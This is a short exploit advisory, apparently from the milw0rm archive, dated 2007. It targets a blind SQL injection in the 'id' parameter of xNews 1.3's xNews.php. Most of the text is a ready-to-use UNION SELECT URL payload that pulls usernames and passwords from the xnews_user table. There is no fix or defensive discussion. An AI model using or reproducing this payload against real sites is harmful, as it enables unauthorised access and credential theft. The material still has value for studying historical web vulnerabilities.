26 lines
No EOL
709 B
Text
26 lines
No EOL
709 B
Text
*******************************************************************************
|
|
# Title : xNews 1.3 (xNews.php) Remote Blind SQL Injection Vulnerability
|
|
# Author : ajann
|
|
# Contact : :(
|
|
# S.Page : http://www.x-dev.de
|
|
# $$ : Free
|
|
|
|
*******************************************************************************
|
|
|
|
[[SQL]]]---------------------------------------------------------
|
|
|
|
http://[target]/[path]//xNews.php?act=shownews&id=[SQL]
|
|
|
|
Example:
|
|
|
|
//xNews.php?act=shownews&id=-1/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/xnews_user/**/where/**/id%20like%201/*
|
|
|
|
[[/SQL]]
|
|
|
|
"""""""""""""""""""""
|
|
# ajann,Turkey
|
|
# ...
|
|
|
|
# Im not Hacker!
|
|
|
|
# milw0rm.com [2007-01-28] |